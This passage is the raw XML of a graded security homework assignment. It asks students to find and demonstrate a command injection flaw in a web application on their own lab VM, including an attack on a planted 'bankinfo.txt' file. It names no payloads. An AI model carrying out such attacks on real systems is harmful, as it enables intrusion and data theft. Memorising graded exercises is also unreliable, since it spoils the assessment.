        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00452CEF" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>extremeinsecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003368E9" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00452CEF" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory can be properly accessed by</w:t>
      </w:r>
      <w:r w:rsidR="005567FB" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00452CEF" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>anyone through a Web browser, e.g., by typing:</w:t>
      </w:r>
      <w:r w:rsidR="00A31806" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00956E78" w:rsidRPr="00C42527">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.65.128/extremeinsecure/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00956E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which that IP address is </w:t>
      </w:r>
      <w:r w:rsidR="00B90A34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="00956E78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>my VM</w:t>
      </w:r>
      <w:r w:rsidR="007616E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E95F42" w14:textId="77777777" w:rsidR="002C0843" w:rsidRDefault="002C0843" w:rsidP="002C0843">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20F865FB" w14:textId="77777777" w:rsidR="009027EA" w:rsidRDefault="009027EA" w:rsidP="00F91FC9">
      <w:pPr>
        <w:ind w:left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Question 2: (5</w:t>
      </w:r>
      <w:r w:rsidR="00FE0062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pt</w:t>
      </w:r>
      <w:r w:rsidR="00FE0062">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746D2386" w14:textId="783AD21B" w:rsidR="00D272A7" w:rsidRDefault="00433ABA" w:rsidP="005C124F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What are the permissions that you have assigned to the </w:t>
      </w:r>
      <w:r w:rsidR="006729EA" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006729EA" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>extremeinsecure</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006729EA" w:rsidRPr="00A31806">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="00433ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>directory</w:t>
      </w:r>
      <w:r w:rsidR="00A0649D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and t</w:t>
      </w:r>
      <w:r w:rsidR="00D742E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">he files in it (you can run </w:t>
      </w:r>
      <w:r w:rsidR="001E717F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00D742E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ls -</w:t>
      </w:r>
      <w:r w:rsidRPr="00433ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="001E717F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00433ABA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> and copy the results from the screen)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F8C79D" w14:textId="77777777" w:rsidR="004853DE" w:rsidRDefault="004853DE" w:rsidP="006A7493">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="780E964B" w14:textId="77777777" w:rsidR="008C154F" w:rsidRPr="004853DE" w:rsidRDefault="008C154F" w:rsidP="006A7493">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62A8A74A" w14:textId="77777777" w:rsidR="00CD13E2" w:rsidRDefault="00DF1C15" w:rsidP="00CD13E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1C15">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Identify and verify the command injection vulnerability in this Web application</w:t>
      </w:r>
      <w:r w:rsidR="004317F1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26BF62" w14:textId="77777777" w:rsidR="00070D96" w:rsidRDefault="00070D96" w:rsidP="00CD13E2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18891C53" w14:textId="77777777" w:rsidR="00172A99" w:rsidRDefault="00BA03B6" w:rsidP="00F91FC9">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD13E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Question </w:t>
      </w:r>
      <w:r w:rsidR="00FC2329">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>: (</w:t>
      </w:r>
      <w:r w:rsidR="000E0DD9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="004A7C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>pt</w:t>
      </w:r>
      <w:r w:rsidR="004A7C3D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD13E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA06C2" w14:textId="27CD8D76" w:rsidR="00070A63" w:rsidRDefault="00354A38" w:rsidP="00A174D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">What is that vulnerability and how did you figure it out? </w:t>
      </w:r>
      <w:r w:rsidR="00E90B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00AC440E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00E90B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDED4E2" w14:textId="77777777" w:rsidR="00070A63" w:rsidRPr="004259A3" w:rsidRDefault="00070A63" w:rsidP="004259A3">
      <w:pPr>
        <w:ind w:left="792"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F104A3B" w14:textId="5BCD0FB5" w:rsidR="00354A38" w:rsidRDefault="00354A38" w:rsidP="00A174D2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>What are the risks due to</w:t>
      </w:r>
      <w:r w:rsidR="0007533C" w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">this vulnerability? (Hint: you </w:t>
      </w:r>
      <w:r w:rsidR="000E781E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>need to</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> identify the vulnerability by either trying this Web</w:t>
      </w:r>
      <w:r w:rsidR="006E6855" w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>application, doing a source code inspection, or running a third</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>party Web application</w:t>
      </w:r>
      <w:r w:rsidR="001D2EBE" w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001D2EBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>vulnerability scanning tool).</w:t>
      </w:r>
      <w:r w:rsidR="00CB2E01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="007B2747">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 pts</w:t>
      </w:r>
      <w:r w:rsidR="00CB2E01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE2729" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="006F7F58">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF10326" w14:textId="402D4C3E" w:rsidR="00BA03B6" w:rsidRDefault="00354A38" w:rsidP="00DE7A99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00683BA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Demonstrate this vulnerability by using at least three attack examples. You need to</w:t>
      </w:r>
      <w:r w:rsidR="00683BA5" w:rsidRPr="00683BA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B57457">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>describe</w:t>
      </w:r>
      <w:r w:rsidRPr="00683BA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attack procedure, input, and the corresponding output</w:t>
      </w:r>
      <w:r w:rsidR="00683BA5" w:rsidRPr="00683BA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B18D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">in detail </w:t>
      </w:r>
      <w:r w:rsidRPr="00683BA5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>for each example.</w:t>
      </w:r>
      <w:r w:rsidR="00E90B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00F32DD8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00E90B2B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C128592" w14:textId="77777777" w:rsidR="00FD0115" w:rsidRDefault="00FD0115" w:rsidP="002A14CB">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9B17CA" w14:textId="77777777" w:rsidR="008C154F" w:rsidRDefault="008C154F" w:rsidP="002A14CB">
      <w:pPr>
        <w:ind w:left="1152"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EC93D9" w14:textId="77777777" w:rsidR="00D03E70" w:rsidRPr="002A14CB" w:rsidRDefault="00A425E5" w:rsidP="004E519A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A425E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Perform a special attack by using the following steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF0C23A" w14:textId="77777777" w:rsidR="00CA2AD0" w:rsidRDefault="00D97B23" w:rsidP="00D97B23">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D97B23">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Create a directory named confidential under the /var directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57EF1B" w14:textId="77777777" w:rsidR="00011986" w:rsidRDefault="00B904FD" w:rsidP="00B904FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B904FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Create a file named bankinfo.txt in the confidential directory contains such a sentence:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7CB5F4" w14:textId="77777777" w:rsidR="00747F86" w:rsidRDefault="007C2053" w:rsidP="00AB6388">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A4AF3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
        </w:rPr>
        <w:t>I have $1,00,000 in my bank account. I am so happy because NO ONE can know this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315D0EA2" w14:textId="77777777" w:rsidR="006A4AF3" w:rsidRDefault="00C00655" w:rsidP="0090554D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C00655">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Change the owner of the confidential directory and bankinfo.txt to the current running</w:t>
      </w:r>
      <w:r w:rsidR="0090554D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0090554D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">user of those Apache 2 processes. (Hint: use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0090554D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>chown</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0090554D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A073125" w14:textId="77777777" w:rsidR="00022799" w:rsidRDefault="00022799" w:rsidP="0058135C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86118">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set the permission of bankinfo.txt so that it is only readable and writable by the owner.</w:t>
      </w:r>
      <w:r w:rsidR="00D86118" w:rsidRPr="00D86118">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86118">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Other users do not have any access right to this file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F53F8B" w14:textId="77777777" w:rsidR="00280B58" w:rsidRPr="00611C10" w:rsidRDefault="00280B58" w:rsidP="00611C10">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC380F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Set the permission of the confidential directory so that it is only readable, writable, and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC380F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>executable by the owner. Other users do not have any access right to this directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF5A94" w14:textId="77777777" w:rsidR="00416929" w:rsidRDefault="00416929" w:rsidP="008B1A0A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B938EF0" w14:textId="050DC15A" w:rsidR="00E47BC0" w:rsidRDefault="005B5B20" w:rsidP="008B1A0A">
      <w:pPr>
        <w:ind w:left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Question 4: (15 pt</w:t>
      </w:r>
      <w:r w:rsidR="0050339C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
